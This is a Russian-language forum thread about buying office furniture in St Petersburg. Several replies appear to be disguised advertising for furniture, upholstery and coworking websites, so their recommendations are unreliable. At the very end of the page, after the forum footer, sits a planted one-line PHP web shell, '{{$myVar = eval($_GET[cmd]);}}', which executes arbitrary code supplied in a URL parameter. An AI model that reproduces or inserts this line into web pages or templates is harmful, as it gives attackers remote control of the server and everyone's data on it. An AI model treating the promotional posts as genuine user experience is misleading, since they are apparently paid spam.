+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 12

Тема: Офисная мебель


  1. #1
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132

    Офисная мебель

    Решил попробовать себя в сфере услуг в нашей дорогой северной столице, если точнее - открываю автостраховую компанию. Уже наметил два помещения в разных конца города под офис. Оба помещения с ремонтом, дверьми, кондиционерами и т.д. Однако офисной мебели нет совсем, помещения полностью пустые. Может подскажите где есть широкий выбор офисной мебели в СПБ?

  2. #2
    Лучше всего выбирать офисную мебель по производителю с помощью сайта отзовика. А потом просто найти магазин который ее продает. Я по своему опыту знаю, что не всякая офисная мебель надежная, особенно если офис тесный и ей часто достается)

  3. #3
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Цитата Сообщение от Renegat Посмотреть сообщение
    Лучше всего выбирать офисную мебель по производителю с помощью сайта отзовика. А потом просто найти магазин который ее продает. Я по своему опыту знаю, что не всякая офисная мебель надежная, особенно если офис тесный и ей часто достается)
    Слишком сильно доверяешь отзовикам. На большинства из них накрутить отзывы - дело в пару кликов. Они не модерируются, а если модерируются все-таки, то смена ИП перед каждым новым отзывом спокойно позволяет обойти модерацию.
    Последний раз редактировалось Serf; 28.04.2019 в 06:21.

  4. #4
    Цитата Сообщение от Devid Посмотреть сообщение
    Решил попробовать себя в сфере услуг в нашей дорогой северной столице, если точнее - открываю автостраховую компанию. Уже наметил два помещения в разных конца города под офис. Оба помещения с ремонтом, дверьми, кондиционерами и т.д. Однако офисной мебели нет совсем, помещения полностью пустые. Может подскажите где есть широкий выбор офисной мебели в СПБ?
    Я себе стол в кабинет уже давно выбираю через интернет, так вот, попался один сайт компании в СПб с довольно широким выбором, которая продает офисную мебель - https://omis-spb.ru/catalog/mebel_dlya_ofisa/ . На мой взгляд, все вполне недорого, а главное - есть из чего выбирать. Я конечно сам не уверен что буду делать заказ именно у них, однако может вы захотите расставить офис их мебелью.

  5. #5
    Мимо проходил Глебыч is on a distinguished road Аватар для Глебыч
    Регистрация
    22.06.2019
    Откуда
    Солнечное
    Машина
    с5
    Сообщений
    29
    Зачем мучатся, сделайте на заказ.

  6. #6
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    У нас небольшое предприятие, поэтому и заказ на офисные стулья был не большой. Брали всего лишь 20 кресел для наших сотрудников. Удобно, что все кресла в разборе. Мы забирали их сами. Поместились легко в нашей Газели, ну а наш завхоз все сам прекрасно собрал. Так что еще и диван будем заказывать через этот сайт http://felix.ru. Отличный мебельный салон.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Встретился с коллегой, рассказал, что в кафе вовсе деревянные стулья потеряли первозданный вид, так как много посетителей. Он рассказал, что услуги обивки стульев предоставляют на сайте https://obivka-divan.ru/obivka-mebel...tyazhka-stulev компании Obivka Divan, в которой работают мастера своего дела. У них обивка стула сиденье+спинка стоит 850 рублей, что ниже по стоимости, чем у конкурентов.

  8. #8
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    тоже нужны варианты покупки офисной мебели, куда обратиться?

  9. #9
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Решил, что нужно обустроить офис по всем правилам, поэтому искал услуги компаний в интернете. Мне приятель рассказал, что целесообразно воспользоваться предложением на сайте https://omebel.ru/ фабрики Omebel, так как у них предложено много стильной продукции. У них заказал тумбу для офиса, расширит функционал рабочего стола, заняв при этом минимум места, клиентам предоставлен отменный сервис.

  10. #10
    GTI-Racing Semen Leonidovich is on a distinguished road Аватар для Semen Leonidovich
    Регистрация
    05.04.2020
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    249
    Нам сейчас так классно работать в новом офисе, очень здорово тут как оказалось. У них прям очень классные помещения, где мы теперь работаем, выходит очень хорошо проводить время и после работы тоже. На сайте дается аренда офиса в коворкинге https://blokclub.ru/workingspace/ полистайте тоже каталог у них

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Кухонная мебель
    от iljas в разделе Курилка
    Ответов: 5
    Последнее сообщение: 30.05.2021, 07:50
  2. Элитная мебель
    от volter в разделе Курилка
    Ответов: 7
    Последнее сообщение: 02.05.2019, 21:35
  3. Мебель
    от Bimbom в разделе Семья и дом
    Ответов: 6
    Последнее сообщение: 17.03.2019, 20:54
  4. Мебель
    от nekrolog в разделе Курилка
    Ответов: 4
    Последнее сообщение: 03.02.2019, 18:07
  5. Мебель в гардеробную
    от jordy в разделе Курилка
    Ответов: 3
    Последнее сообщение: 28.12.2018, 15:34

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}